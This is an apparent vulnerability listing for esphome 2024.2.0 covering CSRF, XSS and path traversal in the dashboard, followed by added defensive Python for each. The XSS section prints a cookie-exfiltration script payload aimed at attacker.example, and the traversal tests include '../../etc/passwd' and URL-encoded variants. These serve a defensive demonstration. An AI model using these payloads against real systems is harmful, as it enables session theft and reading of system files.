esphome@2024.2.0 vulnerabilities
Make creating custom firmwares for ESP32/ESP8266 super easy.
latest version: 2024.4.2
latest non vulnerable version: -
first published: 5 years ago
latest version published: 10 days ago
licenses detected: [0,)
Direct Vulnerabilities
Known vulnerabilities in the esphome package. This does not include vulnerabilities belonging to this package’s dependencies.
Vulnerability | Vulnerable Version
---|---
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) due to insufficient protection for API endpoints in the dashboard component. An attacker can perform operations on configuration files (create, edit, delete) on behalf of a logged-in user by directing them to a maliciously crafted web page. This effectively bypasses authentication for those API calls. The vulnerability can be chained with another issue to achieve complete account takeover. How to fix Cross-Site Request Forgery (CSRF)? Upgrade to a version outside the vulnerable range. | [2023.12.9,2024.3.0)
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the edit configuration file API in the dashboard component. An attacker can inject arbitrary web script and exfiltrate session cookies by sending a specially crafted POST request to that API. Note: cookies are not correctly secured, which allows the session cookie values to be exfiltrated. How to fix Cross-site Scripting (XSS)? Upgrade to a version outside the vulnerable range. | [2023.12.9,2024.2.2)
Affected versions of this package are vulnerable to Path Traversal due to a security misconfiguration in the ... Notes: ... How to fix Path Traversal? Upgrade to a version outside the vulnerable range. | [,2024.2.1)
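The "Vulnerable Version" column uses interval notation: `[lo,hi)` includes `lo` and excludes `hi`, and an empty bound (as in `[,2024.2.1)`) is unbounded on that side. The following parser is an added example, not Snyk's or esphome's code; the three ranges are copied from the table above, and the short labels in `ADVISORIES` are constructed here for illustration. It answers the two questions a practitioner has when reading this page: which advisories cover 2024.2.0, and which is the lowest version that none of them cover.

```python
"""Interval parsing for Snyk-style 'Vulnerable Version' ranges (added example)."""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, ...]

# Constructed for this example: a short label for each advisory in the
# table above, paired with its 'Vulnerable Version' range copied verbatim.
ADVISORIES: Dict[str, str] = {
    "CSRF in dashboard API": "[2023.12.9,2024.3.0)",
    "XSS via edit config API": "[2023.12.9,2024.2.2)",
    "Path traversal": "[,2024.2.1)",
}

# '[' or '(' open bracket, lower bound, comma, upper bound, ']' or ')' close.
_RANGE_RE = re.compile(r"^([\[(])\s*([^,]*)\s*,\s*([^\])]*)\s*([\])])$")


def parse_version(text: str) -> Version:
    """'2024.2.0' -> (2024, 2, 0); rejects anything that is not dotted integers."""
    text = text.strip()
    if not re.fullmatch(r"\d+(\.\d+)*", text):
        raise ValueError(f"unsupported version string: {text!r}")
    return tuple(int(part) for part in text.split("."))


def parse_range(text: str) -> Tuple[Optional[Version], bool, Optional[Version], bool]:
    """Parse '[lo,hi)' into (lo, lo_inclusive, hi, hi_inclusive).

    An empty bound means unbounded on that side, so '[,2024.2.1)' covers
    every version below 2024.2.1.
    """
    m = _RANGE_RE.match(text.strip())
    if not m:
        raise ValueError(f"malformed range: {text!r}")
    lo_br, lo, hi, hi_br = m.groups()
    lo_v = parse_version(lo) if lo.strip() else None
    hi_v = parse_version(hi) if hi.strip() else None
    return lo_v, lo_br == "[", hi_v, hi_br == "]"


def _padded(a: Version, b: Version) -> Tuple[Version, Version]:
    """Right-pad with zeros so 2024.2 compares equal to 2024.2.0."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def in_range(version: str, rng: str) -> bool:
    """True if `version` lies inside the interval `rng`."""
    v = parse_version(version)
    lo, lo_inc, hi, hi_inc = parse_range(rng)
    if lo is not None:
        a, b = _padded(v, lo)
        if a < b or (a == b and not lo_inc):
            return False
    if hi is not None:
        a, b = _padded(v, hi)
        if a > b or (a == b and not hi_inc):
            return False
    return True


def affecting(version: str, advisories: Dict[str, str] = ADVISORIES) -> List[str]:
    """Sorted labels of every advisory whose range covers `version`."""
    return sorted(name for name, rng in advisories.items() if in_range(version, rng))


def first_clean_version(candidates: List[str],
                        advisories: Dict[str, str] = ADVISORIES) -> Optional[str]:
    """Lowest candidate that no advisory range covers, or None."""
    for candidate in sorted(candidates, key=parse_version):
        if not affecting(candidate, advisories):
            return candidate
    return None


if __name__ == "__main__":
    print("2024.2.0 is affected by:", affecting("2024.2.0"))
    print("first clean release:", first_clean_version(
        ["2024.2.0", "2024.2.1", "2024.2.2", "2024.3.0", "2024.4.2"]))
```

Run as-is it reports that 2024.2.0 sits inside all three ranges and that 2024.3.0 is the first listed release outside every range, which matches the exclusive upper bound of the CSRF row.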
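The CSRF row above describes the classic pattern: the victim's browser carries the dashboard session cookie, so a form auto-submitted from an attacker's page is indistinguishable from a legitimate edit unless the server checks something the attacker's page cannot produce. The guard below is an added example, not esphome's code or its actual fix; it models the request as plain dictionaries so it runs without a web framework, and the host `esphome.local:6052`, the cookie name `csrf_token` and the header name `X-CSRF-Token` are assumptions. It layers two independent checks: the `Origin`/`Referer` header must name the dashboard's own host, and a per-session token set as a cookie must be echoed back in a custom header (the attacker's page can cause the cookie to be sent, but cannot read it and cannot set custom headers cross-site).

```python
"""CSRF guard for state-changing dashboard API calls (added example)."""
import hmac
import secrets
from typing import Dict, Tuple
from urllib.parse import urlsplit

CSRF_COOKIE = "csrf_token"     # assumed cookie name
CSRF_HEADER = "X-CSRF-Token"   # assumed header name
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_token() -> str:
    """Random per-session token: the server sets it as a cookie and the
    dashboard's own JavaScript copies it into CSRF_HEADER on each call."""
    return secrets.token_urlsafe(32)


def _origin_host(headers: Dict[str, str]):
    """Host of the page that issued the request, from Origin or Referer."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return None
    parts = urlsplit(src)
    return parts.netloc.lower() if parts.scheme in ("http", "https") else None


def csrf_check(method: str, headers: Dict[str, str], cookies: Dict[str, str],
               own_host: str) -> Tuple[bool, str]:
    """Return (allowed, reason). Both defenses must pass for unsafe methods."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    # 1. Origin check. Browsers attach Origin to cross-site POSTs and a
    #    page cannot forge it; a missing header fails closed.
    src_host = _origin_host(headers)
    if src_host != own_host.lower():
        return False, f"cross-site origin {src_host!r}"
    # 2. Double-submit token. The attacker's page cannot read the cookie
    #    (same-origin policy), so it cannot reproduce it in the header.
    cookie_tok = cookies.get(CSRF_COOKIE, "")
    header_tok = headers.get(CSRF_HEADER, "")
    if not cookie_tok or not hmac.compare_digest(cookie_tok.encode(), header_tok.encode()):
        return False, "missing or mismatched CSRF token"
    return True, "ok"


# Constructed sample traffic as seen by the dashboard host (assumed host/port).
DASHBOARD = "esphome.local:6052"
TOKEN = issue_token()


def legitimate_edit() -> Tuple[bool, str]:
    """The dashboard's own page editing a config file."""
    return csrf_check(
        "POST",
        {"Origin": "http://esphome.local:6052", CSRF_HEADER: TOKEN},
        {CSRF_COOKIE: TOKEN},
        DASHBOARD,
    )


def forged_edit() -> Tuple[bool, str]:
    """A logged-in victim visits attacker.example, whose form auto-submits to
    the dashboard. The browser attaches the cookies, but Origin names the
    attacker's site and the custom header is absent."""
    return csrf_check(
        "POST",
        {"Origin": "https://attacker.example"},
        {CSRF_COOKIE: TOKEN},
        DASHBOARD,
    )


def forged_edit_no_origin() -> Tuple[bool, str]:
    """No Origin or Referer at all (stripped by a privacy setting or proxy):
    the check still refuses rather than guessing."""
    return csrf_check("POST", {}, {CSRF_COOKIE: TOKEN}, DASHBOARD)


if __name__ == "__main__":
    print("legitimate:", legitimate_edit())
    print("forged:", forged_edit())
    print("forged, no origin:", forged_edit_no_origin())
```

Either check alone is usually enough; keeping both means a deployment behind a proxy that rewrites `Origin`, or a client that strips it, still cannot be tricked into accepting a cross-site request.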
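The XSS row has two halves: a value reaching the edit-configuration API is reflected into the page unescaped, and the session cookie is not secured, so injected script can read it. The following is an added example, not esphome's code; `render_edit_page_vulnerable`, `render_edit_page_safe` and `session_cookie_header` are assumed names that model a page echoing the requested file name and the server's `Set-Cookie` header. It shows the reflection beside its escaped form, and a cookie carrying `HttpOnly`, `Secure` and `SameSite` so that even a successful injection cannot exfiltrate it via `document.cookie`.

```python
"""Output encoding and session-cookie hardening for a config-edit page (added example)."""
import html
from http.cookies import SimpleCookie


def render_edit_page_vulnerable(filename: str) -> str:
    """Reflects the attacker-controlled file name straight into the markup."""
    return f"<h1>Editing {filename}</h1>"


def render_edit_page_safe(filename: str) -> str:
    """html.escape turns < > & " ' into entities, so a script tag in the
    file name is rendered as text instead of executed."""
    return f"<h1>Editing {html.escape(filename, quote=True)}</h1>"


def session_cookie_header(value: str, secure: bool = True) -> str:
    """Set-Cookie value for the session cookie with the three protective
    attributes. secure=False is only for a plain-HTTP LAN deployment, where
    the Secure flag would make the browser drop the cookie entirely."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True     # invisible to document.cookie
    jar["session"]["samesite"] = "Strict"  # not sent on cross-site requests
    jar["session"]["path"] = "/"
    if secure:
        jar["session"]["secure"] = True    # HTTPS only
    return jar.output(header="").strip()


def cookie_is_hardened(header_value: str) -> bool:
    """Check a Set-Cookie value for HttpOnly, Secure and SameSite."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in header_value.split(";")}
    return {"httponly", "secure", "samesite"} <= attrs


if __name__ == "__main__":
    payload = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"
    print(render_edit_page_vulnerable(payload))
    print(render_edit_page_safe(payload))
    print(session_cookie_header("s3ssion-id"))
```

The escaped output is what the advisory's upgrade achieves for the reflection; the cookie attributes address the "not correctly secured" note, and `cookie_is_hardened` is the check to run against a live dashboard's response headers after upgrading.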
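For the Path Traversal row, the defence a practitioner wants to see is the one that confines every create/edit/delete to the configuration directory regardless of how the name was encoded. The function below is an added example, not esphome's code; `EXAMPLE_CONFIG_DIR`, `resolve_config_path` and the YAML-only rule are assumptions for illustration. It decodes once, rejects absolute and NUL-containing names, resolves the joined path (which collapses `..` and follows symlinks) and then requires the result to remain under the resolved base.

```python
"""Confining dashboard file operations to the configuration directory (added example)."""
from pathlib import Path
from urllib.parse import unquote

# Assumed location of the dashboard's config directory. It does not need
# to exist for the checks below because Path.resolve() is non-strict.
EXAMPLE_CONFIG_DIR = "/tmp/esphome-config-example"
ALLOWED_SUFFIXES = {".yaml", ".yml"}


def resolve_config_path(config_dir: str, requested: str) -> Path:
    """Absolute path of `requested` inside `config_dir`, or ValueError."""
    base = Path(config_dir).resolve()
    # Decode exactly once, so %2e%2e%2f is seen as ../ before any check.
    name = unquote(requested)
    if not name or "\x00" in name:
        raise ValueError("empty or NUL-containing file name")
    if Path(name).is_absolute() or name.startswith(("/", "\\")):
        raise ValueError("absolute paths are not allowed")
    # resolve() collapses '..' and follows symlinks, so a link planted inside
    # config_dir that points outside is caught by the containment check too.
    candidate = (base / name).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise ValueError(f"{requested!r} escapes the configuration directory") from None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        raise ValueError("only YAML configuration files may be touched")
    return candidate


def is_safe(config_dir: str, requested: str) -> bool:
    """True if the name resolves to a YAML file inside config_dir."""
    try:
        resolve_config_path(config_dir, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: what an edit/delete API might receive.
    for name in ["device.yaml", "sub/../device.yaml", "../../etc/passwd",
                 "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd", "secrets.txt"]:
        print(f"{name!r:32} -> {'ok' if is_safe(EXAMPLE_CONFIG_DIR, name) else 'rejected'}")
```

Comparing resolved paths on both sides is what makes the check robust: a prefix comparison on the raw string would accept `/tmp/esphome-config-example-backup/x.yaml`, while `relative_to` on resolved paths does not.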